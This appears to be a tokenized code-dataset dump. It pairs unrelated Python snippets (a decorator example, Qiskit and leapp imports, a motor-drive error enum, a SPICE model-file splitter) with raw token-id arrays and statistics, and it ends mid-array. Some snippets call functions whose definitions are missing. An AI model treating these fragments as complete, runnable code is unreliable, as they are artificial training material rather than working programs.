965, 25, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 5121, 47, 35263, 9652, 357, 1921, 8, 36123, 284, 5163, 262, 19601, 2438, 7264, 329, 281, 1895, 11241, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 17472, 12994, 13, 1136, 7, 944, 11, 366, 30001, 62, 6371, 4943, 628, 220, 220, 220, 2488, 26745, 198, 220, 220, 220, 2488, 79, 377, 12994, 13, 1136, 353, 198, 220, 220, 220, 825, 2099, 7, 944, 8, 4613, 965, 25, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 2099, 286, 4686, 79, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 17472, 12994, 13, 1136, 7, 944, 11, 366, 4906, 4943, 628, 220, 220, 220, 2488, 26745, 198, 220, 220, 220, 2488, 79, 377, 12994, 13, 1136, 353, 7, 3672, 2625, 7220, 12360, 33, 6020, 4943, 198, 220, 220, 220, 825, 2836, 62, 10951, 62, 30786, 7, 944, 8, 4613, 965, 25, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 383, 2446, 286, 1642, 257, 2836, 7508, 2581, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 17472, 12994, 13, 1136, 7, 944, 11, 366, 7220, 62, 10951, 62, 30786, 4943, 628, 220, 220, 220, 2488, 26745, 198, 220, 220, 220, 2488, 79, 377, 12994, 13, 1136, 353, 7, 3672, 2625, 7220, 12360, 28165, 4943, 198, 220, 220, 220, 825, 2836, 62, 10951, 62, 6371, 7, 944, 8, 4613, 965, 25, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 5038, 11197, 8271, 36123, 326, 5860, 3667, 546, 262, 44529, 2836, 13, 198, 220, 220, 220, 220, 220, 220, 220, 37227, 198, 220, 220, 220, 220, 220, 220, 220, 1441, 17472, 12994, 13, 1136, 7, 944, 11, 366, 7220, 62, 10951, 62, 6371, 4943, 628, 220, 220, 220, 1303, 279, 2645, 600, 25, 15560, 28, 3500, 12, 9979, 415, 12, 9288, 628, 198, 4299, 651, 62, 1868, 66, 7, 312, 25, 32233, 58, 2536, 60, 796, 6045, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1438, 25, 32233, 58, 2536, 60, 796, 6045, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 2172, 82, 25, 32233, 58, 79, 377, 12994, 13, 19904, 2088, 29046, 60, 796, 6045, 8, 4613, 5851, 4548, 540, 3855, 46, 312, 66, 23004, 25, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 5765, 428, 1366, 2723, 284, 19818, 257, 440, 2389, 34, 5121, 47, 422, 6762, 8326, 13, 628, 220, 220, 220, 22492, 17934, 29566, 628, 220, 220, 220, 7559, 63, 29412, 198, 220, 220, 220, 1330, 17472, 12994, 198, 220, 220, 220, 1330, 17472, 12994, 62, 482, 8326, 355, 12876, 8326, 628, 220, 220, 220, 1672, 796, 12876, 8326, 13, 312, 79, 13, 1136, 62, 1868, 66, 7, 3672, 2625, 16281, 32549, 4943, 198, 220, 220, 220, 7559, 63, 628, 198, 220, 220, 220, 1058, 17143, 965, 4686, 25, 383, 4686, 286, 262, 4686, 79, 284, 19818, 11, 12333, 351, 4600, 3672, 44646, 198, 220, 220, 220, 1058, 17143, 965, 1438, 25, 383, 1438, 286, 262, 4686, 79, 284, 19818, 11, 12333, 351, 4600, 312, 44646, 198, 220, 220, 220, 37227, 198, 220, 220, 220, 11593, 22046, 834, 796, 8633, 3419, 198, 220, 220, 220, 11593, 22046, 834, 17816, 312, 20520, 796, 4686, 198, 220, 220, 220, 11593, 22046, 834, 17816, 3672, 20520, 796, 1438, 198, 220, 220, 220, 611, 2172, 82, 318, 6045, 25, 198, 220, 220, 220, 220, 220, 220, 220, 2172, 82, 796, 17472, 12994, 13, 19904, 2088, 29046, 3419, 198, 220, 220, 220, 611, 2172, 82, 13, 9641, 318, 6045, 25, 198, 220, 220, 220, 220, 220, 220, 220, 2172, 82, 13, 9641, 796, 4808, 315, 2410, 13, 1136, 62, 9641, 3419, 198, 220, 220, 220, 11593, 1186, 834, 796, 17472, 12994, 13, 43282, 13, 37669, 10786, 482, 8326, 25, 312, 79, 14, 1136, 46, 312, 66, 25, 1136, 46, 312, 66, 3256, 11593, 22046, 834, 11, 2172, 82, 28, 404, 912, 11, 2170, 28, 3855, 46, 312, 66, 23004, 737, 8367, 628, 220, 220, 220, 1441, 5851, 4548, 540, 3855, 46, 312, 66, 23004, 7, 198, 220, 220, 220, 220, 220, 220, 220, 19601, 62, 30786, 28, 834, 1186, 834, 13, 9800, 1634, 62, 30786, 11, 198, 220, 220, 220, 220, 220, 220, 220, 19601, 62, 6371, 28, 834, 1186, 834, 13, 9800, 1634, 62, 6371, 11, 198, 220, 220, 220, 220, 220, 220, 220, 5456, 62, 312, 28, 834, 1186, 834, 13, 16366, 62, 312, 11, 198, 220, 220, 220, 220, 220, 220, 220, 5456, 62, 21078, 28, 834, 1186, 834, 13, 16366, 62, 21078, 11, 198, 220, 220, 220, 220, 220, 220, 220, 4686, 28, 834, 1186, 834, 13, 312, 11, 198, 220, 220, 220, 220, 220, 220, 220, 44168, 62, 14171, 28, 834, 1186, 834, 13, 747, 15573, 62, 14171, 11, 198, 220, 220, 220, 220, 220, 220, 220, 44168, 62, 6371, 28, 834, 1186, 834, 13, 747, 15573, 62, 6371, 11, 198, 220, 220, 220, 220, 220, 220, 220, 474, 86, 591, 62, 30786, 28, 834, 1186, 834, 13, 73, 86, 591, 62, 30786, 11, 198, 220, 220, 220, 220, 220, 220, 220, 474, 86, 591, 62, 6371, 28, 834, 1186, 834, 13, 73, 86, 591, 62, 6371, 11, 198, 220, 220, 220, 220, 220, 220, 220, 3509, 62, 15750, 62, 82, 365, 86, 28, 834, 1186, 834, 13, 9806, 62, 15750, 62, 82, 365, 86, 11, 198, 220, 220, 220, 220, 220, 220, 220, 1438, 28, 834, 1186, 834, 13, 3672, 11, 198, 220, 220, 220, 220, 220, 220, 220, 8435, 62, 4906, 28, 834, 1186, 834, 13, 11235, 4668, 62, 4906, 11, 198, 220, 220, 220, 220, 220, 220, 220, 629, 13920, 28, 834, 1186, 834, 13, 1416, 13920, 11, 198, 220, 220, 220, 220, 220, 220, 220, 11241, 62, 30786, 28, 834, 1186, 834, 13, 30001, 62, 30786, 11, 198, 220, 220, 220, 220, 220, 220, 220, 11241, 62, 6371, 28, 834, 1186, 834, 13, 30001, 62, 6371, 11, 198, 220, 220, 220, 220, 220, 220, 220, 2099, 28, 834, 1186, 834, 13, 4906, 11, 198, 220, 220, 220, 220, 220, 220, 220, 2836, 62, 10951, 62, 30786, 28, 834, 1186, 834, 13, 7220, 62, 10951, 62, 30786, 11, 198, 220, 220, 220, 220, 220, 220, 220, 2836, 62, 10951, 62, 6371, 28, 834, 1186, 834, 13, 7220, 62, 10951, 62, 6371, 8, 198 ]
2.272422
2,676
# ----------------- Debuggable Decorators ----------------- # # [1] metadata attached to original function is hidden def greet(): """return a friendly greeting. """ return 'Hi, there!' print(greet.__name__) print(greet.__doc__) decorated_greet = uppercase(greet) print(decorated_greet.__name__) print(decorated_greet.__doc__)
[ 198, 198, 2, 34400, 12, 8965, 6837, 540, 4280, 273, 2024, 34400, 12, 1303, 628, 198, 2, 685, 16, 60, 20150, 7223, 284, 2656, 2163, 318, 7104, 198, 4299, 12589, 33529, 198, 220, 220, 220, 37227, 7783, 257, 8030, 31933, 13, 37227, 198, 220, 220, 220, 1441, 705, 17250, 11, 612, 13679, 628, 198, 4798, 7, 70, 2871, 13, 834, 3672, 834, 8, 198, 4798, 7, 70, 2871, 13, 834, 15390, 834, 8, 198, 198, 12501, 273, 515, 62, 70, 2871, 796, 334, 39921, 589, 7, 70, 2871, 8, 198, 4798, 7, 12501, 273, 515, 62, 70, 2871, 13, 834, 3672, 834, 8, 198, 4798, 7, 12501, 273, 515, 62, 70, 2871, 13, 834, 15390, 834, 8, 198 ]
2.889831
118
# -*- coding: utf-8 -*- # This code is part of Qiskit. # # (C) Copyright IBM 2020. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. """ Bell nonlocality testing class.""" import qiskit import cplex import itertools import functools import collections import numpy as np from math import ceil try: from matplotlib import pyplot as plt PLT = True except ImportError: PLT = False try: shell = get_ipython().__class__.__name__ if shell == 'ZMQInteractiveShell' or "google.colab._shell": from tqdm import tqdm_notebook as tqdm else: from tqdm import tqdm as tqdm except NameError: from tqdm import tqdm as tqdm from qiskit.ignis.verification.nonlocality.bell_scenario import BellScenario from typing import Optional, Sequence, Union, List, Dict NumType = Union[int, float, complex] StateType = Union[qiskit.quantum_info.states.DensityMatrix, qiskit.quantum_info.states.Statevector, np.ndarray, List[List[NumType]]] GateType = Union[qiskit.circuit.Gate, qiskit.quantum_info.Operator, List[List[NumType]], np.ndarray]
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 220, 198, 2, 770, 2438, 318, 636, 286, 1195, 1984, 270, 13, 198, 2, 198, 2, 357, 34, 8, 15069, 19764, 12131, 13, 198, 2, 198, 2, 770, 2438, 318, 11971, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 13, 921, 743, 198, 2, 7330, 257, 4866, 286, 428, 5964, 287, 262, 38559, 24290, 13, 14116, 2393, 287, 262, 6808, 8619, 198, 2, 286, 428, 2723, 5509, 393, 379, 2638, 1378, 2503, 13, 43073, 13, 2398, 14, 677, 4541, 14, 43, 2149, 24290, 12, 17, 13, 15, 13, 198, 2, 198, 2, 4377, 19008, 393, 27255, 2499, 286, 428, 2438, 1276, 12377, 428, 198, 2, 6634, 4003, 11, 290, 9518, 3696, 761, 284, 3283, 257, 4003, 12739, 198, 2, 326, 484, 423, 587, 14294, 422, 262, 47324, 13, 198, 198, 37811, 7459, 1729, 17946, 1483, 4856, 1398, 526, 15931, 198, 198, 11748, 10662, 1984, 270, 198, 11748, 269, 11141, 198, 11748, 340, 861, 10141, 198, 11748, 1257, 310, 10141, 198, 11748, 17268, 198, 11748, 299, 32152, 355, 45941, 198, 6738, 10688, 1330, 2906, 346, 198, 198, 28311, 25, 198, 220, 220, 220, 422, 2603, 29487, 8019, 1330, 12972, 29487, 355, 458, 83, 198, 220, 220, 220, 9297, 51, 796, 6407, 198, 16341, 17267, 12331, 25, 198, 220, 220, 220, 9297, 51, 796, 10352, 198, 198, 28311, 25, 198, 220, 220, 220, 7582, 796, 651, 62, 541, 7535, 22446, 834, 4871, 834, 13, 834, 3672, 834, 198, 220, 220, 220, 611, 7582, 6624, 705, 57, 49215, 9492, 5275, 23248, 6, 393, 366, 13297, 13, 4033, 397, 13557, 29149, 1298, 198, 220, 220, 220, 220, 220, 220, 220, 422, 256, 80, 36020, 1330, 256, 80, 36020, 62, 11295, 2070, 355, 256, 80, 36020, 198, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 422, 256, 80, 36020, 1330, 256, 80, 36020, 355, 256, 80, 36020, 198, 16341, 6530, 12331, 25, 198, 220, 220, 220, 422, 256, 80, 36020, 1330, 256, 80, 36020, 355, 256, 80, 36020, 198, 198, 6738, 10662, 1984, 270, 13, 570, 271, 13, 332, 2649, 13, 13159, 17946, 1483, 13, 7923, 62, 1416, 39055, 1330, 7459, 3351, 39055, 198, 220, 220, 220, 220, 198, 6738, 19720, 1330, 32233, 11, 45835, 11, 4479, 11, 7343, 11, 360, 713, 198, 33111, 6030, 796, 4479, 58, 600, 11, 12178, 11, 3716, 60, 198, 9012, 6030, 796, 4479, 58, 80, 1984, 270, 13, 40972, 388, 62, 10951, 13, 27219, 13, 35, 6377, 46912, 11, 220, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 10662, 1984, 270, 13, 40972, 388, 62, 10951, 13, 27219, 13, 9012, 31364, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 45941, 13, 358, 18747, 11, 7343, 58, 8053, 58, 33111, 6030, 11907, 60, 198, 22628, 6030, 796, 4479, 58, 80, 1984, 270, 13, 21170, 5013, 13, 22628, 11, 10662, 1984, 270, 13, 40972, 388, 62, 10951, 13, 18843, 1352, 11, 220, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 7343, 58, 8053, 58, 33111, 6030, 60, 4357, 45941, 13, 358, 18747, 60, 628 ]
2.747698
543
import logging from leapp.libraries.actor.rpmtransactionconfigtaskscollector import load_tasks, load_tasks_file from leapp.libraries.stdlib import api from leapp.models import RPM, InstalledRedHatSignedRPM RH_PACKAGER = 'Red Hat, Inc. <http://bugzilla.redhat.com/bugzilla>'
[ 11748, 18931, 198, 198, 6738, 443, 1324, 13, 75, 11127, 13, 11218, 13, 48235, 7645, 2673, 11250, 83, 6791, 33327, 273, 1330, 3440, 62, 83, 6791, 11, 3440, 62, 83, 6791, 62, 7753, 198, 6738, 443, 1324, 13, 75, 11127, 13, 19282, 8019, 1330, 40391, 198, 6738, 443, 1324, 13, 27530, 1330, 32381, 11, 2262, 4262, 7738, 40483, 50, 3916, 49, 5868, 198, 198, 48587, 62, 47, 8120, 4760, 1137, 796, 705, 7738, 10983, 11, 3457, 13, 1279, 4023, 1378, 25456, 16496, 13, 445, 5183, 13, 785, 14, 25456, 16496, 29, 6, 628, 198 ]
2.957447
94
from .._ingenialink import ffi, lib from enum import IntEnum def err_ipb_last(): """Get IPB last last occurred error.""" return int(ffi.cast("int", lib.ilerr_ipb_last())) class CONFIGURATION_ERRORS(IntEnum): """Configuration errors.""" INCORRECT_ACCESS_TYPE = 0x06010000 OBJECT_NOT_EXIST = 0x06020000 OBJECT_NOT_CYCLIC_MAPPABLE = 0x06040041 CYCLIC_MAPPING_TOO_LARGE = 0x06040042 WRONG_CYCLIC_KEY = 0x08010000 WRONG_CYCLIC_REGISTER_SIZE = 0x06070010 COMMUNICATION_STATE_UNREACHABLE = 0x08010010 COMMUNICATION_NOT_MODIFIABLE = 0x08010020 UNSUPPORTED_REGISTER_VALUE = 0x060A0000 INVALID_COMMAND = 0x08010030 CRC_ERROR = 0x08010040 UNSUPPORTED_SYNCHRONIZATION = 0x00007400 ACTIVE_FEEDBACKS_HIGHER_THAN_ALLOWED = 0x00007500 COMKIT_TIMEOUT = 0x05040000
[ 6738, 11485, 62, 36795, 498, 676, 1330, 277, 12463, 11, 9195, 198, 6738, 33829, 1330, 2558, 4834, 388, 628, 198, 4299, 11454, 62, 541, 65, 62, 12957, 33529, 198, 220, 220, 220, 37227, 3855, 6101, 33, 938, 938, 5091, 4049, 526, 15931, 198, 220, 220, 220, 1441, 493, 7, 487, 72, 13, 2701, 7203, 600, 1600, 9195, 13, 5329, 81, 62, 541, 65, 62, 12957, 3419, 4008, 628, 198, 4871, 25626, 4261, 6234, 62, 24908, 50, 7, 5317, 4834, 388, 2599, 198, 220, 220, 220, 37227, 38149, 8563, 526, 15931, 198, 220, 220, 220, 19387, 1581, 23988, 62, 26861, 7597, 62, 25216, 796, 657, 87, 3312, 486, 2388, 198, 220, 220, 220, 25334, 23680, 62, 11929, 62, 6369, 8808, 796, 657, 87, 41322, 2167, 405, 198, 220, 220, 220, 25334, 23680, 62, 11929, 62, 34, 56, 5097, 2149, 62, 33767, 4537, 19146, 796, 657, 87, 41322, 7029, 3901, 198, 220, 220, 220, 30440, 5097, 2149, 62, 44, 24805, 2751, 62, 51, 6684, 62, 43, 1503, 8264, 796, 657, 87, 41322, 7029, 3682, 198, 220, 220, 220, 11342, 18494, 62, 34, 56, 5097, 2149, 62, 20373, 796, 657, 87, 2919, 486, 2388, 198, 220, 220, 220, 11342, 18494, 62, 34, 56, 5097, 2149, 62, 31553, 41517, 62, 33489, 796, 657, 87, 41322, 9879, 940, 198, 220, 220, 220, 48811, 2149, 6234, 62, 44724, 62, 4944, 2200, 16219, 17534, 796, 657, 87, 2919, 486, 37187, 198, 220, 220, 220, 48811, 2149, 6234, 62, 11929, 62, 33365, 5064, 3539, 19146, 796, 657, 87, 2919, 39103, 1238, 198, 220, 220, 220, 4725, 40331, 15490, 1961, 62, 31553, 41517, 62, 39488, 796, 657, 87, 41322, 32, 2388, 198, 220, 220, 220, 3268, 23428, 2389, 62, 9858, 44, 6981, 796, 657, 87, 2919, 39103, 1270, 198, 220, 220, 220, 45623, 62, 24908, 796, 657, 87, 2919, 39103, 1821, 198, 220, 220, 220, 4725, 40331, 15490, 1961, 62, 23060, 45, 37846, 1340, 14887, 6234, 796, 657, 87, 2388, 4524, 405, 198, 220, 220, 220, 11741, 9306, 62, 15112, 1961, 31098, 50, 62, 39, 3528, 16879, 62, 4221, 1565, 62, 7036, 3913, 1961, 796, 657, 87, 2388, 2425, 405, 198, 220, 220, 220, 9440, 42, 2043, 62, 34694, 12425, 796, 657, 87, 28669, 19, 2388, 198 ]
2.225543
368
#!/usr/bin/env python # coding: utf-8 # In[1]: import re #******************************************************* # user input: # MOSNAME eg: lvnemos4_1p2_lvpw # MOSTYPE eg: _ne_1p2 # LIB_FILENAME = '501per_35_VcA.lib' # MDL_FILENAME = '501per_35_VcA.mdl' #******************************************************** MOSNAME = '_llv_rvtp' MOSTYPE = '_llv_rvtp' LIB_FILENAME = 'trident_1d2_mos.lib' # 这里需要自己改一下lib和mdl的文件名作为路径。测试阶段先取这个方式来打开文件。 MDL_FILENAME = 'trident_1d2_mos.mdl' # In[2]: def get_dict_of_lib(LIB_FILENAME): """输入LIB的文件名,返回各个CORNER名为键,其对应的行内容为值的字典。""" f = open(LIB_FILENAME).readlines() for line_number, line in enumerate(f): if ".lib statistical_mc" in line: end_of_corners_in_lib = line_number print("初步定位到总LIB的第%d行之前的内容为LIB需要分裂出的内容。"%end_of_corners_in_lib) list_of_corners_star2end_tuples = [] for line_number, line in enumerate(f[:end_of_corners_in_lib]): if ".lib" in line: single_corner_start = line_number if ".endl" in line: single_corner_end = line_number list_of_corners_star2end_tuples.append((single_corner_start, single_corner_end)) corner_param_dict = {} for t in list_of_corners_star2end_tuples: key = f[t[0]].split()[1] # tt_llv_corner as key value = f[t[0]:t[1]+1] corner_param_dict[key] = value print("%s已经存入字典,其内容对应行号为%d到%d"%(key, t[0], t[1])) return corner_param_dict # In[3]: def get_dict_of_single_mostype_dict_of_lib(corner_param_dict): """紧接着corner_param_dict = get_dict_of_lib(LIB_FILENAME)后面调用,传入含有多个MOSTYPE的LIB字典。 输出只剩一种MOSTYPE的字典。""" reg_content = "\+.*?" + MOSTYPE + "\s*=" mark_foronetypemos_incorner = re.compile(reg_content) single_mostype_corner_param_dict = {} print("和你输入的MOSTYPE匹配的每个CORNER的首行和尾行如下!") for k in corner_param_dict: v = corner_param_dict[k] new_v = [] for line in v: if mark_foronetypemos_incorner.search(line): new_v.append(line) single_mostype_corner_param_dict[k] = new_v print(new_v[0], new_v[-1]) print("********************************************************************************************************") return single_mostype_corner_param_dict # In[4]: # In[5]: #corner_param_dict = get_dict_of_lib(LIB_FILENAME) #get_dict_of_single_mostype_dict_of_lib(corner_param_dict) # In[6]: def get_blank_striped_mdl(MDL_FILENAME, MOSNAME): """输出是去除了空行的mdl内容。""" f = open(MDL_FILENAME).readlines() content_temp_start = '.subckt\s*' + MOSNAME + "\s" regex_temp_start = re.compile(content_temp_start) content_temp_end = '.ends\s*' + MOSNAME + "\s" regex_temp_end = re.compile(content_temp_end) for line_number, line in enumerate(f): if regex_temp_start.search(line): print("定位到总MDL文件的第%d行作为临时起始行"%line_number) temp_start = line_number if regex_temp_end.search(line): print("定位到总MDL文件的第%d行作为临时终止行"%line_number) temp_end = line_number tuple_of_linenumber_for_mdl_in_use = (temp_start, temp_end) temp_start = tuple_of_linenumber_for_mdl_in_use[0] # '.subckt\s*'的行号 temp_end = tuple_of_linenumber_for_mdl_in_use[1] # '.ends\s*'的行号 mdl_in_use = f[temp_start: temp_end+1] for line_number, line in enumerate(mdl_in_use): if ".model" in line: newstart = line_number mdl_content = mdl_in_use[newstart:] startlinenumberinoriginalmdl = newstart + temp_start # '.model'在'.subckt\s*'和'.ends\s*'之间的行号 print("定位到总MDL文件的第%d行作为真正的起始行"%startlinenumberinoriginalmdl) blank_striped_mdl_content = [] for line_number, line in enumerate(mdl_content): if line.strip() == "": print("第%d行是空行。"%(startlinenumberinoriginalmdl + line_number )) continue blank_striped_mdl_content.append(line) blank_striped_mdl_content print("根据你输入的MOSNAME:%s,将从原总MDL中复制第%d行到第%d行。"%(MOSNAME, startlinenumberinoriginalmdl, temp_end)) print("********************************************************************************************************") return blank_striped_mdl_content # In[7]: def clean_all_mis_in_one_line(line): """利用从右向左的机制去一直去除_mis参数,返回除去干净了的Line。""" while True: if '_mis' in line: startof_mis = line.rfind('_mis') # 从右向左,找到了_mis的位置 startof_plus_nexttomis = line[:startof_mis].rfind('+') # 找到了第一个紧靠mis左边的+号 startof_equal_nexttomis = line[:startof_mis].rfind('=') # 找到了第一个紧靠mis左边的=号 remain = line[startof_equal_nexttomis:startof_plus_nexttomis] #第一个紧靠mis左边的=号到 mis直接的字符,用于判断是纯数字了,还是数字+参数的格式 # remain 是这样的 "= '0.35 + deta0_ne_1p2 " original = line[startof_equal_nexttomis:startof_mis+5] #把含_mis'这部分原始的取出来,如"= '0.35 + deta0_ne_1p2 + deta0_ne_1p2_mis'" if '+' in remain: for_replacement = remain.strip() + "'" else: for_replacement = remain.strip().replace("'","") line = line.replace(original, for_replacement) else: break return line # In[8]: ####################测试去除每行中MIS的代码#################################################################################### ################################################################################################################################## # line = "+pnfactor = -3E-14 eta0 = '0.35 + deta0_ne_1p2 + deta0_ne_1p2_mis' peta0 = '-1.81E-15 + dpeta0_ne_1p2'" # line = "+pnfactor = -3E-14 eta0 = '0.35 + deta0_ne_1p2_mis' peta0 = '-1.81E-15 + dpeta0_ne_1p2'" # line = "+pnfactor = '0.39 + pnf_ne_1p2_mis' eta0 = '0.35 + deta0_ne_1p2_mis' peta0 = '-1.81E-15 + dpeta0_ne_1p2'" # while True: # if '_mis' in line: # startof_mis = line.rfind('_mis') # 从右向左,找到了_mis的位置 # startof_plus_nexttomis = line[:startof_mis].rfind('+') # 找到了第一个紧靠mis左边的+号 # startof_equal_nexttomis = line[:startof_mis].rfind('=') # 找到了第一个紧靠mis左边的=号 # remain = line[startof_equal_nexttomis:startof_plus_nexttomis] #第一个紧靠mis左边的=号到 mis直接的字符,用于判断是纯数字了,还是数字+参数的格式 # # remain 是这样的 "= '0.35 + deta0_ne_1p2 " # original = line[startof_equal_nexttomis:startof_mis+5] #把含_mis'这部分原始的取出来,如"= '0.35 + deta0_ne_1p2 + deta0_ne_1p2_mis'" # if '+' in remain: # for_replacement = remain.strip() + "'" # else: # for_replacement = remain.strip().replace("'","") # line = line.replace(original, for_replacement) # else: # break # line ################################################################################################################################## ################################################################################################################################## # In[9]: # In[10]: # #########测试cf去除效果################################################################################################ # ####################################################################################################################### # line = "+cf = '0 + 4.5E-11*pre_layout_sw' clc = 1E-7 cle = 0.6" # line = "+clc = 1E-7 cle = 0.6 cf = '0 + 4.5E-11*pre_layout_sw'" # line = "+clc = 1E-7 cf = '0 + 4.5E-11*pre_layout_sw cle = 0.6 '" # print(line) # startof_cf = line.find('cf') # startof_pre = line.find("*pre_layout_sw") # startof_equal = line[:startof_pre].rfind('=') # startof_plus = line[:startof_pre].rfind('+') # for_replacement = "=" + line[startof_plus:startof_pre].replace('+',"").strip() # 得到 '=4.5E-11' # orginal = line[startof_equal:startof_pre+len("*pre_layout_sw'")] # 得到 "= '0 + 4.5E-11*pre_layout_sw'" # line = line.replace(orginal, for_replacement) # print(line) # ####################################################################################################################### # In[11]: # In[12]: ############用于测试替换cf的代码################################################################################################ ################################################################################################################################## # line = "+cf = '0 + 4.5E-11*pre_layout_sw' clc = 1E-7 cle = 0.6 " # startof_cf = line.find('cf') # startof_pre = line.find("*pre_layout_sw") # startof_equal = line.find('=') # startof_plus = line[startof_cf:startof_pre].find('+') # for_replacement = "=" + line[startof_plus:startof_pre].replace('+',"").strip() # 得到 '=4.5E-11' # orginal = line[startof_equal:startof_pre+len("*pre_layout_sw'")] # 得到 "= '0 + 4.5E-11*pre_layout_sw'" # line.replace(orginal, for_replacement) ################################################################################################################################## ################################################################################################################################## # In[13]: def get_allparams_cleaned_mdl(mydata): """输入是被定位出来的含有出事model内容的mdl列表,称为mydata。输出被正则替换掉全部参数的mdl列表""" # 这一段注释是测试代码,用于验证正则表达式 # pattern = re.compile(r"\'([-]*[0-9.E]*\-*\d*)[+-]*.*?\'") # 这是当初为钟灿写的正则,我现在也看不太懂了。 # for line in mydata: # if "'" in line: # print(line) # print(pattern.findall(line)) pattern = re.compile(r"\'([-]*[0-9.E]*\-*\d*)[+-]*.*?\'") # 这是当初为钟灿写的正则,我现在也看不太懂了。 without_all_params = [] print("现在执行替换全部MDL参数的函数**************************************************************************************") print("所有的含义参数的行内容如下*****************************************************************************************") for line in mydata: if pattern.search(line): print(line) # print(pattern.sub(r'\1', line)) line = pattern.sub(r'\1', line) without_all_params.append(line) #without_all_params = without_all_params[:-1] # 去掉最后一个 .ends lvnemos4_1p2_lvpw print("********************************************************************************************************************") return without_all_params # In[14]: # In[15]: ###########处理LIB的部分######################################################################### corner_param_dict = get_dict_of_lib(LIB_FILENAME) single_mostype_corner_param_dict = get_dict_of_single_mostype_dict_of_lib(corner_param_dict) final_lib_part = get_final_lib_part(MOSNAME, single_mostype_corner_param_dict) ###########处理MDL的部分#################################################################### raw_mdl = get_blank_striped_mdl(MDL_FILENAME,MOSNAME) mis_cleaned_mdl = get_mis_cleaned_mdl(raw_mdl) cf_cleaned_mdl = get_cf_cleaned_mdl(mis_cleaned_mdl) allparams_cleaned_mdl = get_allparams_cleaned_mdl(cf_cleaned_mdl) ############################################################################################ final_lib = get_final_lib(final_lib_part, cf_cleaned_mdl) libfilename = MOSNAME + '.lib_NEW' pmfilename = MOSNAME + '.pm_NEW' with open(libfilename, mode='w') as f: for line in final_lib: f.writelines(line) with open(pmfilename, mode='w') as f: for line in allparams_cleaned_mdl: f.writelines(line) input("输入任意键退出!")
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 2, 19617, 25, 3384, 69, 12, 23, 198, 198, 2, 554, 58, 16, 5974, 628, 198, 11748, 302, 198, 2, 17174, 8412, 2466, 8162, 198, 2, 2836, 5128, 25, 220, 198, 2, 337, 2640, 20608, 29206, 25, 300, 85, 77, 368, 418, 19, 62, 16, 79, 17, 62, 6780, 79, 86, 198, 2, 337, 10892, 56, 11401, 29206, 25, 220, 4808, 710, 62, 16, 79, 17, 198, 2, 45651, 62, 46700, 1677, 10067, 796, 705, 33548, 525, 62, 2327, 62, 53, 66, 32, 13, 8019, 6, 220, 220, 220, 198, 2, 10670, 43, 62, 46700, 1677, 10067, 796, 705, 33548, 525, 62, 2327, 62, 53, 66, 32, 13, 9132, 75, 6, 198, 2, 17174, 8412, 4557, 198, 44, 2640, 20608, 796, 705, 62, 297, 85, 62, 81, 85, 34788, 6, 198, 44, 10892, 56, 11401, 796, 705, 62, 297, 85, 62, 81, 85, 34788, 6, 198, 40347, 62, 46700, 1677, 10067, 796, 705, 2213, 738, 62, 16, 67, 17, 62, 16785, 13, 8019, 6, 220, 220, 1303, 5525, 123, 247, 34932, 234, 165, 250, 222, 17358, 223, 164, 229, 103, 32432, 109, 162, 242, 117, 31660, 10310, 233, 8019, 161, 240, 234, 9132, 75, 21410, 23877, 229, 20015, 114, 28938, 235, 43291, 10310, 118, 164, 115, 107, 36181, 226, 16764, 38184, 233, 46237, 243, 165, 246, 35050, 106, 113, 17739, 230, 20998, 244, 32573, 247, 10310, 103, 43095, 28156, 237, 30266, 98, 33699, 241, 28156, 222, 23877, 229, 20015, 114, 16764, 198, 12740, 43, 62, 46700, 1677, 10067, 796, 705, 2213, 738, 62, 16, 67, 17, 62, 16785, 13, 9132, 75, 6, 628, 198, 2, 554, 58, 17, 5974, 628, 198, 4299, 651, 62, 11600, 62, 1659, 62, 8019, 7, 40347, 62, 46700, 1677, 10067, 2599, 198, 220, 220, 220, 37227, 164, 122, 241, 17739, 98, 40347, 21410, 23877, 229, 20015, 114, 28938, 235, 171, 120, 234, 32573, 242, 32368, 252, 28938, 226, 10310, 103, 44879, 21479, 28938, 235, 10310, 118, 165, 242, 106, 171, 120, 234, 17739, 114, 43380, 117, 41753, 242, 21410, 26193, 234, 37863, 227, 22522, 117, 10310, 118, 161, 222, 120, 21410, 27764, 245, 17739, 116, 16764, 37811, 198, 220, 220, 220, 277, 796, 1280, 7, 40347, 62, 46700, 1677, 10067, 737, 961, 6615, 3419, 628, 220, 220, 220, 329, 1627, 62, 17618, 11, 1627, 287, 27056, 378, 7, 69, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 611, 27071, 8019, 13905, 62, 23209, 1, 287, 1627, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 886, 62, 1659, 62, 20772, 364, 62, 259, 62, 8019, 796, 1627, 62, 17618, 220, 220, 220, 220, 220, 220, 220, 220, 198, 220, 220, 220, 3601, 7203, 26344, 251, 